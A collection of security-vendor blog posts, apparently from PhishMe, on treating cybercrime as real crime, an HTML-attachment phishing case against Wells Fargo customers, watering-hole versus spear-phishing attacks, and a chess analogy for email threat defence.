Numbers of Victims of Cybercrime are Soaring

Reports from law enforcement agencies around the world show that there have been even more victims of cybercrime in the past 12 months than in any other year. Attacks are being conducted alarmingly frequently, and cybercriminals are becoming even more brazen. However, cybercrime is still not dealt with in the same way as other types of crime.

Say you leave home, only to return to your front door kicked in. Everything of value has been stolen. What would you do?

You’d call the police immediately, right?

Now pretend you get an email from what looks to be your bank. They inform you that your banking password needs changed. A link to do so is embedded in the email. The next time you log into your account $1,000.00 is missing. Who would you call?

Most people would instinctively call their bank. But, why wouldn’t they call the police?

You should call the police first. After all, it is a crime. However, this is not how we typically approach online theft. Not only have I devoted my life to identifying and stopping cybercrime, but I’m a victim as well. My mission from the beginning has been this: I want to change people’s thinking about online theft.

On a trip to the grocery store, my card was declined for a small purchase. Knowing that there was more than enough to cover the bill, I contacted my bank only to find out that someone had gone to a Wal-Mart three times and spent $1,800.00 out of my account.

I called the police immediately. They only wanted to file a police statement so the bank would return the money.

The main focus wasn’t just getting my money returned. I also wanted to track down the criminal and put them in jail. However, the police didn’t seem interested. The crook lived in San Diego and I’m in Alabama. They would need to catch the criminal, fly him to Alabama, then house and feed him until the trial. The cost of these expenditures would far outweigh the $1,800.00 that was stolen.

Not satisfied with what I was hearing, I contacted the San Diego District Attorney.  They informed me that they’d be glad to help as long as I’d sign an affidavit stating my wife or I would fly to San Diego to testify. Without a witness during the trail, the criminal would most likely be let go with no penalties. The cost of the ticket with room and board during the trial would have been more than the $1800 I had already lost.

I was unable to afford the trip, so I began fighting in a different way.

I began devoting all my time to tracking down cybercriminals and sharing the information that I found, in order to help people protect themselves.

I began to ask, “Why we don’t treat cybercrime the same as physical crime”? If someone would break into your home and steal your TV, we blame the robber. If someone steals $1,000.00 out of your PayPal account, we blame the victim for not having sufficient firewall protection or prevention software. What’s wrong with this picture?

Why are these crimes not acknowledged or tracked by the government? In 2012 alone, there were 18 new victims of cybercrime every second. 9 million of those fell victim to fake banking websites. 19 million Americans had money taken off their credit cards without authorization. 43% of Americans are still the target of large amounts of spam.  Despite this, none of these activities are tracked by the Department of Justice.

While I continue the fight to inform people of cybercriminal activity and change tracking procedures, what can the consumer to do protect himself? Consumers should monitor receipts, credit card statements and bank accounts.  And, although this isn’t the way that things are currently handled, I believe in the mantra “If you see something, say something.” When consumers are victimized by cybercrime, they should call the police, and if they don’t respond the way that we all think they should. Also, consumers should let their elected officials know by contacting their congressmen and senators. It needs to be known that we want justice against these crimes.

Learn more about my personal experience with cybercrime by viewing my recent talk on the TedX Birmingham Stage:

How did you get into the security industry? Was it a personal experience with cybercrime? Share your experience in the comments section below.

Phishing with a malicious .zip attachment

A few weeks ago, we received a round of phishing emails with malware that seemed a little more special than your run-of-the-mill ZeuS, so we decided to give it some analysis. The email was reported by a user at PhishMe. We really do drink our own kool-aid. Figure 1 shows a screenshot of the email that is being analyzed.

Figure 1

Figure 1 — Original Message

HTML Attachment Phishing: What You Need to Know

Are you aware of HTML attachment phishing? It is one of the latest trends with cybercriminals. Instead of emailing downloaders that contact C7C servers to download crypto malware, Troijans, or other nasties, HTML attachments are being sent. HTML phishing emails is less well known, and as a result, many people are falling for phishing scams.

Even though this past weekend was a holiday weekend for many, there is a good chance that you still checked your email fairly often. If you are like me, you typically use your phone or another mobile device to check your email on the go. This past weekend, you were probably multitasking and may not have been on high-alert for a fraudulent message while you were checking email in between hiding and finding Easter eggs.

Hackers know these things.

So, they send crafty messages like this one (shown as opened in the Thunderbird email client):

If you open that message on your phone, the attachment would probably download with the message, and all you have to do is click to view it. This is a little different than your typical phishing message; a typical phishing message contains a button that has an embedded link that takes you to a lookalike of your bank’s or another online service provider’s real web site.

In today’s example, the phishing page has been stored as a file that looks like the following in a desktop browser:

It will also load up in your phone’s browser, but Safari (or another browser) on your phone may just show you a truncated version of the Internet address you are visiting. When it is a local file, you may just see a portion of the name of the file, Wells_Fargo-Personal-Business_Banking.htm as on my iPhone below:

So, what can Wells Fargo do about that? You may think there is no phishing content to be taken down or removed because it seems encapsulated in the email message. You may think that nobody is harmed if you don’t reply or fall for logging in this way. However, some folks WILL reply, and there is fraudulent content on the Internet that can be referred by Wells Fargo to their takedown provider.

In the source code of the HTML attachment are instructions for how to handle the credentials that the victim enters. Below is a snippet of the code from this phishing attack:

<form id=”frmSignon” action=”hxxp://” autocomplete=”off” method=”post” name=”signon”>

The highlighted portion is the path to a PHP script on a compromised server in Portugal that hosts a domain belonging to a Brazilian gospel video web site. Undoubtedly, if we could view the source code of that PHP script, we would see that is contains the email address of the criminal who is receiving the stolen Wells Fargo credentials. Wells Fargo wants to remove this fraudulent content before its customers can be victimized.

When we visit that page, we see that the PHP code redirects victims to what we call the “exit URL” which is a legitimate login page at Wells Fargo. The victim will then think that their login failed, and they will try to log in again. It is at that moment that Wells Fargo can recognize that customers who login there—having been referred from the URL—are customers who likely just gave up their authentication credentials and should have their accounts locked until the situation is rectified.

PhishMe provides the intelligence that enables Wells Fargo and other spoofed brands tackle this threat vector. Our PhishMe Intelligence system scans over two million spam messages daily to identify the messages that are delivering HTML attachments. Then we use our patented technology to automatically identify the file as a phishing attack and extract the relevant intelligence.

PhishMe digs deeper than other threat intelligence service providers to find the source of the attacks.  Learn more about how we can help you protect your brand here

Watering Holes vs. Spear Phishing

How Does A Watering Hole Attack Work?

Water holing attacks originate by compromising trusted websites and infecting the computers or other devices that visit that site. A successful watering hole attack casts a wide net and has the potential to compromise a large number of users across multiple organizations. This flood of information is a double-edged sword, as attackers have to parse through a large amount of data to find information of value. Additionally, these attacks often exploit zero-day vulnerabilities, so their increased popularity means attackers are burning through zero-days faster, and companies are responding faster as well, stopping attacks earlier in the kill-chain.

 These attacks are an effective tactic, that when executed properly, can deliver widespread damage on a large scale. Symantec released an excellent report describing the APT group “Hidden Lynx”, who the report describes as the inventors of the watering hole technique. The report details last year’s VOHO campaign, which targeted iOS developers, and impacted users at Facebook, Apple, and Twitter – showing the power of a water holing.

The Danger Of Indiscriminate Watering Hole Attacks

Instead of viewing indiscriminate watering-hole attacks as a replacement for spear phishing, they can be seen as an additional tool at adversaries’ disposal, which is what makes it so dangerous. Like all tools, spear phishing and watering hole attacks have specific strengths and weaknesses that suit them well for certain jobs while making them limited in other situations.

As described above, watering hole attacks gather huge amounts of data that attackers will have to sift through for useful information, thus slowing down their ability to take additional malicious action.

Spear phishing, on the other hand, offers attackers the ability to focus more on specific targets and information. A successful spear phishing attack provides immediate access to a target’s systems. Given the amount of readily available information on organizations and their employees on the Internet, attackers can easily identify targets and craft seemingly genuine emails that will provide gateways to specific systems and ultimately data. Spear phishing can exploit zero-days to drop malware on a host, but it doesn’t rely on vulnerabilities. Simple social engineering tactics have allowed groups such as the Syrian Electronic Army to carry out a multitude of high-profile attacks.

“Spear phishing offers attackers the ability to focus more on specific targets and information.”

Anecdotal evidence continues to highlight spear phishing as the source of most high-profile breaches. As previously mentioned, spear phishing is the attack method of choice for the Syrian Electronic Army. Brian Krebs also reported that the Target breach started with a spear phishing email that unloaded malware and stole login credentials from Target vendor Fazio Mechanical.

The fact that news reports around watering hole attacks are stating “watering-hole usage” rather than “company x compromised by watering hole attack” indicates that either companies aren’t discussing successful campaigns, or that the attackers are still refining their tactics. Even if they are successful, the attackers may be inundated with information and are still deciding whether they have found anything useful.

There’s no denying that watering-hole attacks are making an impact, but the idea that it is replacing spear phishing is erroneous. While Symantec’s 2014 Internet Security Threat Report notes a decrease in the overall volume of spear phishing emails, the number of campaigns increased by 91%. Adversaries aren’t turning away from spear phishing as an attack method; instead they are sharpening the focus of their attacks. Symantec attributes this to growing user awareness (we’d like to take some credit for that), but it is probably also due to the dynamics discussed above.

For casting a wider net intended to compromise a large number of users, watering-hole attacks are an effective tactic, but for a highly focused attack seeking specific information, a well-crafted spear phish is still an adversary’s best weapon.

Cyber Chess: How You Can Win

Most of us are not very good at playing chess – if we play at all.  However, many of us at least have some familiarity with the game. The following quick description will help in the discussion of Cyber Chess – the game the good guys (white pieces) “play” against the cybercriminals (black pieces) as they try to steal anything we value from our cyber world.

The chess game is described in three phases.

The Opening:  During the opening, you and your opponent make several moves to establish a battlefront.

The Middle Game:  The middle game is the direct battle zone. This phase is spent attacking, being attacked, defending and looking for ways to stabilize your defenses or cripple your opponent and break down his/her defenses.

The End Game: This is where the game comes to a conclusion when, excluding the occasional draw, you either win or you lose to your opponent, Checkmate!

Simple enough, right?  And it is, all you have to do is checkmate your opponent – i.e., capture their king more or less. Of course, there are those who would argue that it is not that simple. They say you have to be really smart and know a lot! They point to the fact that for just the first four moves in a chess game, there are 318,979,564,000 possibilities. For the first ten moves, the number is 169,518,829,100,544,000,000,000,000,00. After that, the numbers start to get big, with the total possible moves in the neighborhood of 10120 or 1 followed by 120 zeros – quite a big neighborhood!  Hmmm, maybe they have a point.

Chess is a game of extremely big numbers of possible moves. Cybercrime is a “game” of very big numbers.  Annually-

  • 26,280,000,000,000 malicious e-mails sent
  • 2,628,000,000,000 get through current defenses
  • 13,140,000,000 are effective

To be clear, Cyber Chess is not “a” game. It is thousands and millions of concurrent games rolled into a continuous stream of threats to which we must respond – in other words, we must “play.”  So, the answer to the “Do You Play?” part of the title question is yes, you do play.  You may not want to play, you may not know how to play, but like it or not, you are definitely in the game!

The Cyber Chess opening begins with criminals sending out nearly 75,000,000,000 malicious messages (spam, phishing, malware) every day. Your opening moves are probably to make sure your antivirus (AV) software is updated and that your various network devices are current with respect to known threats.  Assessment of the opening game:  Advantage Black.

The middle game plays out with your defenses blocking what they can and with the cybercriminals taking what they can get in terms of successfully getting into one or some of your users’ computers and then into your network.  Using an industry average figure of 1 in 200 attacks being successful, and assuming your company has maybe 1000 users, that means that on average 5 of your users will fall victim to an attack that made its way past your defenses.  Of course, all it takes is one successful compromise to allow the criminal to take up residence inside your network. Does this really happen that often considering the money companies spend on cyber defense? If you ask Target, Niemen Marcus, Franciscan Health, dozens of universities, and hundreds of other companies, it absolutely does happen!  From the 2013 Verizon Data Breach Report:

  • There were more than 47,000 security incidents reported
  • Resulting in 621 data breaches
  • Email attacks were the primary mechanism to deploy malware into enterprises either directly or indirectly.   (Figure 20/pg 29 of the report)
  • 67% of the time in large enterprises, email was the direct vector
  • And still more often, malicious email was the mechanism by which bad guys gained access to a computer and then directly installed malware on it.
  • Of the 621 data breaches, how did companies find out? (pg 54 of the report)
  • Only 4% were detected by Network IDS (Intrusion Detection Systems)
  • Only another 4% were detected by analyzing log files
  • Anti-Virus programs didn’t detect any of them!
  • Most companies learned about their data breach from an external source
  • Examples: Customers, law enforcement. This happened 70% of the time.  (pg 53 of the report)

It is also interesting to note that the average time between when a breach occurs and when a company detects it has been breached is about 210 days (Trustwave). That’s a long time that the criminal has to develop his or her “middle game,” solidifying their presence in your network and positioning for a win in the end game.  Of course, they are taking your “pieces” all along the way.

Significant in all of this is that according to the Verizon report, none, zip, zilch, nada, of the breaches were detected by Antivirus programs. That is truly comforting news – for the cybercriminal.  Assessment of the middle game: Advantage Black

The End Game.  Unfortunately, there is not end to this game, at least not an end that anyone can foresee from the present state. For a long time, we will be forced to play the middle game in response to a continuous assault of opening moves by the bad guys.  Can you play the game using yesterday’s tools and yesterday’s strategies and tactics?  Absolutely you can!  Can you win the game doing that?  Absolutely you cannot!

Cybercriminals continuously evolve their tools and tactics to improve their success based on what they learn about their enemy, about us. Theirs is an intelligence-based approach and when they see that something is not working, they make changes.  Too many of us continue to put our faith in things that might have worked in the past, but that we know, in our minds and hearts, are no longer effective.  Why is that so?  For one thing, antivirus companies continue to sell the message that they protect us from bad things, and they do. The problem is that they do not protect us from the worst things and even when they finally do, it often is too late.  The other problem is that for such a long time, we have been conditioned to think in a compliance-based way.  If we follow the rules and regulations and do we have been doing, and use the updated versions of yesterday’s weapons, we will be okay.

The question to ask at this point is ”How is that working for us?” Given that daily reports of breaches would fill several pages of the daily newspaper, the honest answer has to be “Not very well.” A casual review of the 2013 Verizon Data Breach Report already gives us the answer.  The new question is “What can we do to get better at the game and have some hope of eventually winning?”

The new answer is that we must shift away from believing the well-intended but misguided idea that others can protect us with outmoded tools while we blissfully go about our business.  We must realize that today’s solutions to today’s criminal attacks are found in actionable intelligence and proactive intervention.

What this means is that we must employ actionable cybersecurity intelligence and forensic analysis about email-based threats (phishing, spam and malware) that identify, prioritize and target cybercriminal activities and provide effective countermeasures. This includes the ability to identify the root sources of cybercrime attacks (servers, perpetrators, locations, etc.), obtaining rich actionable intelligence information about cross-brand attacks and targeted attacks, as well as advanced notification of emerging email-based threats.  Only then will we be able to respond effectively to attacks on our brands, and to disrupt email-based threats against us.  Only then will we be able to improve our game.

Cyber Chess – Do You Play?  Yes, you don’t have a choice.

Can you win?  Perhaps, but not by continuing to play yesterday’s game.

Assessment of the end game: It’s up to you.  Your Move!

Why Do We Treat Cybercrime Differently than Real-Life Crime?

What would you do if you were the victim of a crime? For example, what if you walk out to your car after work and find the window smashed and the stereo stolen? Wouldn’t you call the police?

Imagine that, this weekend, you’re leaving a bar with some friends. A man walks up, points a gun at you and demands your wallet. You’d call the police, right?

Now pretend you receive an email saying that the bank needs you to reset your password. You go to the provided website in the email and the next time you check your balance there’s $500 missing. Who would you call?

The bank, right?

Our first inclination is to call the police when we’re the victims of crime in real life. Why do we treat cybercrime differently than any other type of crime?

When it comes to punishing cybercriminals, the biggest obstacle is that they’re usually too far away from their victims. Even if they’re caught, the court fees, travel expenses to the court, and lodging normally outweigh the amount stolen. It’s easier to just call the bank and try to get your money back. While this isn’t exactly “right”, it’s currently the easiest course of action when dealing with online theft.

Another problem is how the general populace treats cybercrime. When a victim’s front door is kicked in and their house robbed, we immediately blame the criminal. When your online banking information is stolen, we typically point the finger at the victim and scold them for not having the most up-to-date antivirus software or firewall.

In terms of reporting criminal activity, the government does have laws that say we should report every crime to the Department of Justice. Crimes like burglary, aggravated assault, and murder are measured. They do not measure cybercrime. There’s not even a box to check in regards to online theft on a police report.

So why are they not tracking that? Semantics say that there are 18 new victims of cybercrime every second. In 2012, nine million Americans fell victim to fake bank websites, 19 million Americans had money taken off their credit cards without authorization, and 43% of Americans are still experiencing heavy volumes of spam. These seem like pretty steep numbers to not take in account.

In order to change this, we need to embrace the idea that if we see something, we say something.  When cybercrime happens, call the police. If they don’t respond the way you think they should, notify elected officials about the crime. Take the issue to congressmen, senators, governors, DAs and the Attorney General. It needs to be known that we want justice against these crimes and it needs to start with the victim.

How do you think that we can improve enforcement around cybercrime? Share your comments below.

Learn more about this topic by watching Gary’s presentation at TEDx Birmingham here.